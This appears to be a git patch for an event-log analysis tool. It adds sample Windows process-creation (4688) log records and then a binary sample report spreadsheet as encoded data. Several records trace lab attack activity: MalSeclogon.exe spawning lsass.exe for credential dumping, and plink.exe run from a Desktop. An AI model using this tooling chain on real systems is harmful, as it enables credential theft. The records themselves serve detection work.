+ + + + S-1-5-18 + PC01$ + EXAMPLE + 0x3e7 + 0xce0 + C:\Windows\System32\LogonUI.exe + %%1936 + 0x768 + + +" +2019-02-13T22:05:05.123416+04:00,1550081105.123416,4688,C:\Windows\System32\winlogon.exe,PC01$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 227774 + + + + + Security + PC01.example.corp + + + + + S-1-5-18 + PC01$ + EXAMPLE + 0x3e7 + 0x768 + C:\Windows\System32\winlogon.exe + %%1936 + 0x62c + + +" +2019-02-13T22:05:04.873056+04:00,1550081104.873056,4688,C:\Windows\System32\csrss.exe,PC01$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 227773 + + + + + Security + PC01.example.corp + + + + + S-1-5-18 + PC01$ + EXAMPLE + 0x3e7 + 0xadc + C:\Windows\System32\csrss.exe + %%1936 + 0x62c + + +" +2019-02-13T22:05:04.802956+04:00,1550081104.802956,4688,C:\Windows\System32\smss.exe,PC01$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 227772 + + + + + Security + PC01.example.corp + + + + + S-1-5-18 + PC01$ + EXAMPLE + 0x3e7 + 0x62c + C:\Windows\System32\smss.exe + %%1936 + 0x124 + + +" +2019-02-13T22:05:01.037541+04:00,1550081101.037541,4688,C:\Windows\System32\rundll32.exe,PC01$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 227769 + + + + + Security + PC01.example.corp + + + + + S-1-5-18 + PC01$ + EXAMPLE + 0x3e7 + 0x410 + C:\Windows\System32\rundll32.exe + %%1936 + 0x278 + + +" +2019-02-13T22:04:57.862976+04:00,1550081097.862976,4688,C:\Windows\System32\LogonUI.exe,PC01$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 227751 + + + + + Security + PC01.example.corp + + + + + S-1-5-18 + PC01$ + EXAMPLE + 0x3e7 + 0xc70 + C:\Windows\System32\LogonUI.exe + %%1936 + 0x4b8 + + +" +2019-02-13T22:04:57.672703+04:00,1550081097.672703,4688,C:\Windows\System32\winlogon.exe,PC01$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 227750 + + + + + Security + PC01.example.corp + + + + + S-1-5-18 + PC01$ + EXAMPLE + 0x3e7 + 0x4b8 + C:\Windows\System32\winlogon.exe + %%1936 + 0x38c + + +" +2019-02-13T22:04:57.542516+04:00,1550081097.542516,4688,C:\Windows\System32\csrss.exe,PC01$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 227749 + + + + + Security + PC01.example.corp + + + + + S-1-5-18 + PC01$ + EXAMPLE + 0x3e7 + 0x9d4 + C:\Windows\System32\csrss.exe + %%1936 + 0x38c + + +" +2019-02-13T22:04:57.462400+04:00,1550081097.4624,4688,C:\Windows\System32\smss.exe,PC01$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 227748 + + + + + Security + PC01.example.corp + + + + + S-1-5-18 + PC01$ + EXAMPLE + 0x3e7 + 0x38c + C:\Windows\System32\smss.exe + %%1936 + 0x124 + + +" +2019-02-13T22:04:01.632120+04:00,1550081041.63212,4688,C:\Windows\System32\UI0Detect.exe,PC01$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 227726 + + + + + Security + PC01.example.corp + + + + + S-1-5-18 + PC01$ + EXAMPLE + 0x3e7 + 0x934 + C:\Windows\System32\UI0Detect.exe + %%1936 + 0x990 + + +" +2019-02-13T22:03:35.734882+04:00,1550081015.734882,4688,C:\Windows\System32\slui.exe,PC01$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 227721 + + + + + Security + PC01.example.corp + + + + + S-1-5-18 + PC01$ + EXAMPLE + 0x3e7 + 0xa38 + C:\Windows\System32\slui.exe + %%1936 + 0x278 + + +" +2019-02-13T22:03:28.338519+04:00,1550081008.338519,4688,C:\Users\user01\Desktop\plink.exe,user01,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 227714 + + + + + Security + PC01.example.corp + + + + + S-1-5-21-1587066498-1489273250-1035260531-1106 + user01 + EXAMPLE + 0x2ed80 + 0xcfc + C:\Users\user01\Desktop\plink.exe + %%1936 + 0xe60 + + +" +2019-02-13T22:02:19.518362+04:00,1550080939.518362,4688,C:\Windows\System32\AtBroker.exe,PC01$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 227712 + + + + + Security + PC01.example.corp + + + + + S-1-5-18 + PC01$ + EXAMPLE + 0x3e7 + 0x250 + C:\Windows\System32\AtBroker.exe + %%1936 + 0x1d0 + + +" +2019-02-13T22:01:47.602470+04:00,1550080907.60247,4688,C:\Windows\System32\TSTheme.exe,PC01$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 227695 + + + + + Security + PC01.example.corp + + + + + S-1-5-18 + PC01$ + EXAMPLE + 0x3e7 + 0x1fc + C:\Windows\System32\TSTheme.exe + %%1936 + 0x278 + + +" +2021-12-07T21:33:14.919262+04:00,1638898394.919262,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329925 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x24e0 + C:\Windows\System32\svchost.exe + %%1936 + 0x274 + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + C:\Windows\System32\services.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.680326+04:00,1638898381.680326,4688,C:\Windows\System32\lsass.exe,IEUser,C:\Windows\System32\lsass.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329921 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 0x1494 + C:\Windows\System32\lsass.exe + %%1936 + 0x27c + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + C:\Windows\System32\lsass.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.680005+04:00,1638898381.680005,4688,C:\Windows\System32\conhost.exe,IEUser,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329920 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 0x11e4 + C:\Windows\System32\conhost.exe + %%1936 + 0x17b8 + + S-1-0-0 + - + - + 0x0 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + S-1-16-12288 + +" +2021-12-07T21:33:01.636384+04:00,1638898381.636384,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,MSEDGEWIN10$,C:\Windows\System32\lsass.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329919 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x17b8 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + %%1936 + 0x27c + + S-1-0-0 + IEUser + MSEDGEWIN10 + 0x16e3db3 + C:\Windows\System32\lsass.exe + S-1-16-12288 + +" +2021-12-07T21:33:01.474816+04:00,1638898381.474816,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329916 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x1bc4 + C:\Windows\System32\svchost.exe + %%1936 + 0x274 + + S-1-0-0 + - + - + 0x0 + C:\Windows\System32\services.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.409312+04:00,1638898381.409312,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,IEUser,C:\Windows\System32\cmd.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329914 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x53ca2 + 0x21a4 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + %%1937 + 0x2480 + + S-1-0-0 + - + - + 0x0 + C:\Windows\System32\cmd.exe + S-1-16-12288 + +" +2022-05-01T08:42:06.656542+04:00,1651380126.656542,4688,C:\Windows\System32\notepad.exe,WIND10$,C:\Windows\System32\wbem\WmiPrvSE.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 21374 + + + + + Security + wind10.winlab.local + + + + + S-1-5-20 + WIND10$ + WINLAB + 0x3e4 + 0x1dc + C:\Windows\System32\notepad.exe + %%1936 + 0xe8c + + S-1-0-0 + Administrator + WINLAB.LOCAL + 0x82215a + C:\Windows\System32\wbem\WmiPrvSE.exe + S-1-16-12288 + +" -- 2.34.1 From 6055ac9016725b605946aaa1e0abbe0b441b25fa Mon Sep 17 00:00:00 2001 From: pex7hfbnt <1584881064@qq.com> Date: Wed, 16 Oct 2024 23:43:54 +0800 Subject: [PATCH 07/13] ADD file via upload --- source/samples/Sample_Report.xlsx | Bin 0 -> 202427 bytes 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 source/samples/Sample_Report.xlsx diff --git a/source/samples/Sample_Report.xlsx b/source/samples/Sample_Report.xlsx new file mode 100644 index 0000000000000000000000000000000000000000..59cb16f28e6d6f757a189b7bb5165c31523960f4 GIT binary patch literal 202427 zcmZ^~cQ{;O(?3oKB5IHjf)Ks;79}J^C(+w#izv~ft`Y=Mqxat1>MdB&Syu18ccQb} z_sH|S*YA3N*Y*C9UCx;^_uO-TX67?4Ua1%(L@1%(K> zqAO+l)d~F738dy`2X@qFceSw|h}Tzc<0SrZcuOL0i_7xi11}EyO}*N)Bh0b0*5|dg z+e}#Z3tv6o;~o=!d@Eozk#^FeoV-3Tvp)!@N%C!<+wu>t@1+?kRBfPS*n?coZIxp+ zkI6lkmTG(MQ?mGb3-85qPV9k~L~(AmheF-FexHo3S+~l$xyxe2ni{$4xKn$${%TZB zZxjwwR@+|6`JFXJa7K-`$ta(2Hly3CP=`>)1;lE$<c`?)hDRjy86AiW>2qQeIHpW}&=wE4Fy`F@Vg6BgB=dv3ol3@JXDq zeWf>BRrlY~`rbgUXh+-Hm#d#PkSO^1)?m|#i{?{QMr_0W41BWO72nFRS@C|YRTRU>FKYW%({ZVS?#F04k{IGVN z^z|cFX6|q5oOya)vDPVXhV6uXI;X&4Eq+P- z7>)=;w8HPc*yA%l#R#Ou}`(FCi&Qd;r{C~!?{*eF@YtVxKA1W zMUrW7Y&+;%YxrqV*`X7%*Js1OuofXP(@0lv%QeDh{Z-d?``5lv7PYy~O&_DF!mD6k zx3R;NADSDP%ql~h`WlnJZ$$IcJ`QDO)TUSvelAp6f$PAWDQ5MbYz~IXOV-^tP$UI> zr*+YOVsgVh!XPl@iSoZa5@h&^O&x%BBMu76OTZ(p)*SzFii@p-m9ed@)dR5qIjA`v zZrRRB@ZsVXI~zh9al)=z$rNBcdy3{S>P4W-9fj;!)O^G1OpT+TpdCz>DPrzSYV&PT zKiMfKIulVr?d@X%Pr?l1i^}5`xQzP)QYf|wrn$)=I znKRaHbc`6ZV${pngZC(}x@`1yTv=2zBBD_;F?UomV4Dr#ROJ~`uh$yLt(40rRCC%{k$%KSs|)hw<+3X# z{rCc{F4VW0%WjwSBNbX*q%SYG9Shk<2DG{u-)aZ`qF5=<5O2oK;~PJZdaG$AJJgS*Lz!E6RzwNMA)BN z;r+gE8kn4RoLW0LBTqko87;tm1)N`FNX(;@lf26@O0jx6;-`VD^SqkIBEO+*$gcq7 z*JD+5dtt*Wf;W60SwGTz91ZR{Gsryu`5V+4ymKq?+$;OjyhN{tUa*r;>ZkXj77h@t zbyn>j!dPX@3Z0Map=w^Pxe7^44b}0;DPB*zq~E^cxXL<$vC>p&KO&S(Oi!Hs+4;^0 zEiVc9KK)9>V5$$u6Z?oul`AdD4PABG_7ra3cKxh_E#FPg%B$(_*qI#lS?i_EPR5Vv zdp^3na;Fp!JFm0U4_fX|znIo9=UhVJDNM*HrS=}{#K3hDG8%@7LU8G7>Ve#__S#vMCIWkF0)c*oi=u+Rn{#h zI`JX8krIBURoGpYC95B??p`ux^3>j2M0v-ZbTQv9XJhP& zdVSaCcFpm>(|%|4hm9qm2u1;E|NqD|-2XC7yuNMn1EslOA-KRL@O~GQV;M!Cxt;T6 z=9@B6bOuJK5C1GIJ(H?RxwLA*XkoH@10vXwXmHOyxKL$1BdN|K{xYD2p}1L?c-(&D z{-&bkCj`1*xf7YHPG^2cHI1A+;TR3Eq@0b8NzH$%w%;%AtS|cH`#0|>@I<&88%yb0 z5mS{CezM8XL|8vwd(JUMXnQ0kSVQejK0x*)@g?(MNV8ty?PsRqgWQj_gWCCZi)lX_ z&o)P;GHdSKnxr>)?&*`}o{A?Z2gZ7n9FM%5G`Ob*PWs&Ml=Gy0;ic!_vOq;ot0uqx zs(i-_ef`=>!8GAlFFl|weT~*)He;Qm%0%01J0*kkN$*XXDF%#Sw8s-{ypWcGQCR%iq+3Pljn)C3OSoD%lF#xog>6@Saw% zi3A4B#CZg+gYJCIF7WL3Fa-JYAF+oV*@+k{*da*sv+uakXZ4cku%?#!h~J^tBI;MwiBF&Pc zl_i&J*d)4%1SdvbLhAuFDcW}~YDTnUGK{eSpCp{t%BR9}Ek9|Lm`MEFW8;afP=8jV zbn3J|Lp=(k`;I?9K}=L`CRcIEMi?`%%Il^3>i4So!6n&q@oUh{hBbz_5a~1V_LaK# zD9(Pty4K=_O!OJEhpdD*{QIOYVWrPpZsuNz3#?*}y|~$bN_-SamMX|ZmO zO^7jEmeQ*(%rVomKs)|X{a+uc-zg-{E=qp}seVHV?J(Xoe&;R8X1bKZ{2K|8EenO= zk>s}hdffQ>aV)`YpL1YS78}{~lKfOPxh`FrwV3qz%*`0$(Y#uF$e?Z`TcLL?q0QD-Jtmr#kE#`Gq$=o-~jR#o0+uY0*#;Sa4|DyLnQDe@SaWDqz#MMmys zwC9{c5kl;mJ>GnBkVmjs|9L2?iEl;ZH>Cxn%-{c98zPV1`wUSQzK0>_AWAmfN^)vi z?x_c%h-Xm!`fAmnl1^zZc!&aywL85FU5$S`zn{BQ@T--S)(-0Ll0Lu4Vg;hr_p;ver@c z={@fxP3ex(6O5YlFVG^LWxpazneBoi9XNwJ?f~a6GWt)3mVvfm#0hZM*V)_4{5=>% z+J-db3Us7n$}E*_?==#7us^HQ^7Oaj@TeGC#@oHxVj%Jm#O7N|Zk6UKAHuQbjWt#I zJ$2nG$5TFnQ^Kpx$3NO(mZX(QX2o0K#oLV4sp4o;9!6g~)WM%5$6XLRZ^EKzof}-r zOEP}Jn{=>uw9}g?M&woY`_C5(CKtC50>PW}2}P4X$S-d~S~y>8U5gd3T`OG)M!RI1 zDl{o~F`TVZNu9s=-?%%2=tL+1xU>7eamV{#+(l$lKV)M~(gT?ftuxZ83bWhYZ=$XF ze|rov)|wTOn$FC7!z?zX7+-r}HXRD3oD>+k-{%XtnbRYa>d1V&u-;BQZz`FU!tlDC zo1<&prL&QDUtxo{f+qZ~Z*<+4S8Bw$=|y8R_Id1LDs|D{fhe@4JkniC)a5!qNaZH| zlp1pRKJ0*Fsq~KchyBn{DnEv~7Lgb9I6E1lz2H;}AZg!eFMs=!*@^KYrTYyo!g6$FzOq`&c)qey z%d8O$v3la%olPg3rORIzM>fW$8$vh2CKB>^JFdC&yE8nx^Y{b1%9!}D%(v5F-m%u2 z(5`h6ER)b9oX*U5R(xU7U9`H&AF>a+3*$&n`9Bj%OK)jth6PrQjyJqh`}}KoAi7La zM8v^uK2;*#Xp$*HPvi%w+B4KjM6xR(*E&wJJvN^234%F9Rcl5W2uIcDV)wEeK(qZkA%W*m+z6{_uH^ADz7v6qW8^iy4TGGaA(xk`|{okxgL0b_xpZd z;Qs7n@otmj{(Mx~`+l5k2@1P85A?piUc6tW^19sx-Cf#>->!FqD8=u)mAyq{y|1op zy|0cAH}7v|VRy**`^#Bn@w@GPsRx5LZLDB-@Cfg_UHn7ByJcG!u?%_`sDtu78y-N$=hpLpLKw;y_)6*mNX;svoX5Lm(|Be z_0OP40OZC*T+9!Jl)TKJ4dS-rht?9R% zcT$FOgkO~J^$+Z$(kSusKAcj+0*AeVxgj~+(m9nFP@ElSbt$fmVL@8T{;Dmcmb<9> z$f8p5Y*iE_wN+C^C_-LU<(s;*I5J$H8a6XspUMbhoi#KE%})POI%}Q3-W<`Mo#-lw zNUJNmzf6O2RU*e*nt#e&cO!7XsuAH{%<^9M%*nA;jv}gF+EsrL6}65kBHe5vAd{`` zF#&?uRKMxoEK0vwp@dZ6P*T6{%X@=&L$C2%g_+rwn#88=p_XRchFVa@z+b&UVbGA|EFfH0F$YS8pQT4wOK`jK7s+ z?66s7DSSYql6@DuVCMVP+(trO?obJvPDn5IrAzI+<2m2Y>87lr)Ld6UsPHj@f5#d{ zOU@)phroUV+Vu|o+|wO{UI_<6ymLr&`c9|s9lmd7Qzrw2KO zQBt~3mL%VcT=(j3%8Ag`oF|;5{O-~Y%_@bc59GzsyeQx|kCirL+xnJ^+bX}^-m6Q8 z+59Z>M?z7n%jL^YeHxTCsl3J7&$G5{t_9R;>WEtCsv7?>L6gu20qrsY&Zk(ZOjz;_$X?N^D&7uiDux{C89f~us;xVb{m)B(d`^$03 zIu9XTQ|vjY9oWGgmB94aD{9KcVCvIE;vvKP;VU$Pu!@)t?znQNJ8H}~KN{VF)=@fR z#8OU;zNxU%{@nJozI$H*E!8ZX{iv?{^o-MHzu4lrj+`->Y(Fa|YOwED1{)M(IVvT3 zE)nWDmh|egg`CGpBM1%tFHC{HmSh5$rQ3Xzus&g5?cg57^g8bTzGLH=?drF_pq(VVE6ho|1lB?<> zi!tuOx$s3Cemo&Y4FFNoUxl8k_Ln_ZU$@R=lt!ZhuOgny8Ph#%4=0_QSTn4=cV_>XLJ20--5D09?Zj~ON?l|r>D$VCl z4wXqPo&73+Lb=b{UM|U1VkoOHD)~gtI3T`5?w^Z=D_m{-19Wu{w4Vy*mV&7@Tv=ZG zOpPg*Kl9OArq;;vYI7LW!R+{HXSJSIQ%$d-rC6f!49$7jM#4B?vO~_tSk9%{S*1kn zz@~YVO)}&>u0ku56=SDu)~6HOyyDpd=4@X*X9@F|J#c&4$--l+tzM!+`k(;CB%odE ziJ`)FSsh*|i9eTqGZPi(gpyK%=;V2iZt=In$MxV1Hopo23mQ)#4&OF_yn6lZC zy9{R&_MK6tMPkfuY=Xc$0a!d#qhoM?@(Oo6lKnjwdAa7Wbt_|-?@S)MaGXyUw#`RY z)KDgfFx`)pR;_oWqrrcT4OwecokeehRdKi#_-&X%0a>?oYQ|6!ITN}Ju3TjXB6hs6 zUg=U2DHC}hoYHFAEEN7}bi;hj82Y4>>xms;cnx0ola&Ow!qunUW&N6|CtPN)8pCdx zN@P{FqO(+}(P|V^B_mOK{2wKvOXQtyzcKGXL_ z5x$^94QHBnC;$8JbSR^{nr$wc0vMCJ{f`n!xWoMO3f5?1G-(wc` znOL>Q#+AwW!~SenEfAfPp1A9c4_7YClM(@IuG?8A{!ZtVO>}KQ;NMN~1zJFW&EExz_r4#mm-&k$KtORxP%<86Xyb z{Fl2&OPP>EE7JC(lypCaA-k<*~Pr{LrAd5%T}$)09JU$WhQV&j`gYkd#hH-r{`!j zwvAmXXwQqA_%(n$L$#PfBLxKLBik*sx^qhv>)G0@;@ZJJl@e~^V&YEDgFGu7K8XrB z)e;QGAMOh&?_B|5nxES##<%Y)zP0UNq0b_^r{+#opC|_z*VdFMR(yJfRFT5tq zeYRG2!I-#thQG@s?3lD*V(vMB!>|UO$&IXodh@Wk5@W~6lGjn&CC1m5S~oL3sXX;txTNogBe)3$ z3iXM5Im-?tM0I>j!)UdiMk+u&9Y=l+ysN|*8+NA5gwSZ)fUQeGXU8*Vg=)b5O2Fo> zymF?bE~8^Zk7%r_#U>t6ONrVlQDzEBOrQv#GG%-4oK+CPi@w&nN)o3k-%n`ymZ(x^ z`$pusT3ed?ArmIT>ZT6rg@QXb2(;05hPp!!_KU^NYwHHCh6f+N6IV?m?R32^vYfIZ z?tMv<$R!}bJ+xnq8&twX<9LiUAVNV{AeAoAC?MF8J#f5Lsb%Tg;FO4}rf+5u(_^ue z%|t!w_F<^BV)%9N&+ZgfNk`WbXEF2ZW}&C^L1q`7?j+=Zi+(RmzG6eEl=dxoEHQy> z76LqqwlS1%x;M}y7)K{?E7n`ZMQ!yTciN<8K9=~=I8Oy67qPSybVWcT>Jh1_Yd4p} z9F^xnLf^*{)o1PL^7(Ax&m*<6!4=Q#NOy#U5)%*Xw7L%@n>)U3sh-AZVHwK_q#9}E zlLFOCUp2wNSY%&i57p1P(-84&_7%pi51Co;{$*Q2U57Dos_0heA7L=3%5SgTi!DG% zhh!J^yK}%lQS|?a)-u=X7>gADbk-o*CH^A}{dtD+M_8tuk~#rdU)S*s^N+AZxPh@p zaNHCkiAaPc&>0(a=}4EFwU6ov{3z6|eKPI~HQ4qnUG^*;Q=f>RV*0j>Z^mHlqn~Q5iC_NI*}F}6YMk)5)9VuN zX1epVl^IIi_&kv9!`TO-s%{zycd~~T%O}g=V;iNuXmdv~*jepmnshq!bVujV$J(`% zyseqHbcW{~;8=C_{Z7;gU1NC2t z`aqSIi!uL>lXwc%_%F9kN?dYZuy~3K9hI_*QGVJZ;~{uY{xpmKo67m4amr1;@6V<( z{_;J#loVyikK&}be2E2W{K(VNuF10Q87^8Tmtb(1M$jn;N9>ZuG;@}T?H-e&df@gM z&>C`#IXW;uX*U8KnCTL7-NS+SD!Y-LmaMbO%HoZyarg2;-b?#I-uG)N?vNGZslyId z`#UIVOs01Ygm}u?=43brJc<<6IVed@8LW=5xyAUDx=+S2?Wu-PlL3Dl; z?$gYn>q};D$N_F&g4E*IGk-?2$;U+t&bV@hynnffeYTtbWb6mgE)uvp=rR%}Z3j%(SX#9#T9%Tohag^{H43>0T-6!imZG7d+KhB`@sD4LaUE z!CBpDR}UwQX^Hu2xvV2FLE{f*aO7;dZu8+iO|z$>BABS9ab(f;f>R{?mc(H3!tFBj z<0dW8hsAn@W?b^Q9$BFi12LD{|HqEeTH)({lR2A}G(`zIKVyLJ%-MEnHx?s~vz3jH z(avgG&FG)<234!gZ}1se4?+f(?~2&Q89KJ+D8>ckw&oJXJF5VP3RYw_+^+6d+oTUK zKIx%IJ534gpr@^nl?5!N>^8x8!_O2v;M1WpI4uiT2<)JbN>GCLD?dwKe^ahl#%lAz zF>ccI4L@11qMR}5q;<2IgmJXyA2T07`E)N_0ke}nD**xT=OCWl>6yecvaU)l5|kd^ zWcDkXHK7M{sr*L$QK+SmUi|h8mo)}so>%dnsac+%F_CKjobQ#h!^#u4($nHYUH9SM z_d!`MSkdEc^mM>eViwB@@7SzA5htVmd~kbWBHqt|zSPo-6!4~#g0yjT6lsCzZht?{ zj!|^h6pjjx^P)Cpr`al^)&nu}Sy+N^0w{UTMmDX+(Uns;TGq856T+YC@z2Cx|E!36l_ELRJ+=ZFWTnjX0U2^S{1x&mCwU5vm`(>dHlYWbMi&*}{Z<}nxy&l^xW*l8y0?RffJgSh1q|nXjWETB86!;j5 z$N19o$V9xQLF2=$Osg6R*s+lWH;^I0aE`=>K2bB z`AdU>x7RZFCms8!urDVEo(mRrD|CTYkDLFxnVfN}y*QWL%Bl)0;Mia1<9TJc%z?qE zv_o&RFfd3?5G?lk8_a1cElg(nlM~Su(W+MbbgW4MyWWqX4~Mj4&~gW%dKCAk1&WxA zN-r5~7G4dJw;;iqrjAz$RWzdp(lPrwe>lElxYfMDyvf60wGJ=y(?GqUoBmDUj`m5L zwHHMCg0*+*)fel$cuCusH5Gm=w}L~1>3-WE3y+dMqxD4X>EkuO9!m81Ca`DMzt2@n z?5K{{HEeF|Ej8WP4-LYYUfahz6DiT#sC#dVI#r0;Ah_LI?e^k>Eo}mPbwlrmangKe zg${Yq(|BKs7qcN-En8vSX?Hhm>-LW99-7j&J#LNP?6x-O1uJMdv7+j*jh#Ts9!L=N{QV^@WEB0WXv%+fSP!oi+ zW~F_i38=01V`{e=ti2Dc6F!;_st+Bz82M7HcV57;-n#BN3f72`8fPU9mIAH3irUfC zO6j<_FP`&!{}NQNZ5L9P57rPPkx0Vg(DA6--H>SH}x#sXv_sl&%-vgJ;D9+<{^@+o#vB0+9!?Fbd=+bci5zNc?9d%2S}rg6wU2ZChqH$-aCp^Q?F^ z(^7GxKQQx*YRDHkVv6u&G8UtV?9BeP#szvrI*RFY5P#RuP*62V6S3gHr_V&%ozySq zUcjy(y~Z>Ci}*EYr6-WM=eYoa%D?q|SA0elX ziqET9ks(W;+%UVtuWtAcU!)l z@{^DK-cJQ14#z39>2LU%ExbaEr|UuIYA8qCebd>^p_8AJpQ+sm_jt#>z1E;?IL~r< z4Sl$V1k}QL68avrP5@f1(=PHHjxwOsC5fdDZbJJx z1JlrK+8;JJKAdLEewKL-%Ydz&dvWsqo&mI=;7BOr+DX)Tr&P=L9&>D!^`}?IkwOT4 zy=l2&-9m=0Veiq!u}MQZJbl*Ph7Q-n${4T5lO6sqGzMl$2b2y9Y>uhg%B$1c?+vzycEBq?yCDH-pWJ%mTch3wJOgER zXbK*YupUm!QV@cc*PEZAQsMQCx9_Z={`)Qdg8KUaF3HTOw&1SsoYRYGAc8;!3oL{? z%P1?*K=)inZ;w5WfF{Y;P`e&9H?S?bTfmERxeixBpQ&9g1Jth3RL1MvV$Au3-UY;W z`#ryKNrUA`%u0wZ{#kA>#jzZ^n;^9&M~L3r9u^4@^6kRy2p=S8`fOYqfY4KqfPc~s zFMgYcP(%N=83dE!V>YGH2e5~9yH?uAcXBU`fR_VAGXq4IV;IO?v}yW?l-!=FQsPmw zd&DrP@bT`zp@GAGFNaXLbc8UTH{S8kB!o}bf5srO&%0<~Hdh7!F zUAn8G@ai%KioX&E<2mzh9=%=mVIW+RZP>2FbfxiyJB)&ZOls{UQI!Rkg3%p?{(C=o z&S@I$?Vq+Z*-`j~{E}7@W!qF@|G~Pn^D>uzS)MC1;rf&Ox513c#OrPiibssfk;4kw z$}LJAth$uC&=*Q5p-5$v@jbk+9U_80 z(pH=hM`gkNWo6CMcEbH-6kY2mtP3@tjdi}xcF}ipRd~gk7fN|bn=p;&Nq@m_6&cWj zC;6g(qSAVQ%f9z$`=U$(*=H?TEOISo;ML5&;(46^RD?|MpgbPZ`#ih%coXO;<#Cvg{K8Cp;}g z8IUJZ$46S?(mOT_C4yEhxUchCx~72OoiOByDB2YbykW~u9+RuWevxIu9-QG#)GaO41SdDKBwtn=m7h|&33B(6B27e z)uV4R|4`Npwu%YQ#=S;OBak~-3X}qh7{c7+zvQN&4(DiY>kb`Wv6@Ire=lbMcv3Lz zt^8qE*eQNI?D#!RaUj(PnA|Yb;k12-Us;Xz)DQLFS26Z&ld0ax5EM0fo7VPR-uvl% z?OXZzPaZK=`vS87te>w-_d@ND(HaDzkE{u=mQk*^tO$|7?%`d0__r@J(#5tQu+xZF z()-z8*Gom<{1_6XR@^ol))Y4q2S~LvG#~|_Ue;jUsQDbMuOwl5v0;7|T1@HN6SF^K z>jL9>QM;s;zf}PNRP6H*>T~wZQzFpckpdIyT&Z?JmgGZXGj019Fp8xoK&4y_Qj z6)}?5^ghZ9zBRGvW?N8a%SFki=bD2)xtU(x+$7@#9|A(E15*EWWUdtSE*LfjWp}o872-~9Fv`SdZAyq9(^r6(;w?c+FeFk{in))uYG7k&Uh@I z-4R&&{9$Qs*^_eU>+@-_HlJ%FoZI%V^@H32np+K^Z_>3F`e7~*?Z&ymV{Y=-wF08b zJMLzI2d++8spw%Y)HNI%YP(}q4Nvt0$^7LJ8l?0E;kQC%mhvAtacoYD{@ragMefbr zjx5^T-O24}IH%nQ8{u3!V|%6gQT2p4K5|F*5=DVg`le$KH5;p4v_dyq*E|PJ`yim-=$6m61#Gs-QwD~&g>?z-?Zkq>0ZJfHu z2N+@)e{EquiZBy|KLnN8dhmhYqUhL#5vr9bSCZ35bfM9#f7`ShafdRha=b9Ir3H`Bnsko1jhZsCWT(S3?6s(=K{#l z5~eCM94J6%M%LP6eIy8RaZvJKaUm@go=tC^sq_zR$Zpp?tXp?5<@(?^@P3)SQ57HGk_4G_s9@% z2Qr>HH}nWsXO*1dR2p9|T*4MTLx5)JGpc92=n(m(SX$vx*kNG(#{o?^B+AkI>%|L- z3yjX@KlZlN2Z_XUL3V%-$O#V$L0?_n5X;L8K0C=`G2XCKmv~rZ@0X3DMMFSPMYWL;F9mknG+DYP+SwMGVKq#rr&HKvtLx3+g#tv?}k*N)5j;%kDeoBi#;Dy zLbzf9ohjF59gwOy-s#mACf{C%QPbt87@~b(hrbUejqVlgw;0-L+ou>W`ZpPfYKyho z5#O?Ilk=!kE=>SlTka$0h~8d&DXUu`b8_1rrVw5#KK3%uHgyL~>^;531XyL_+=lh) 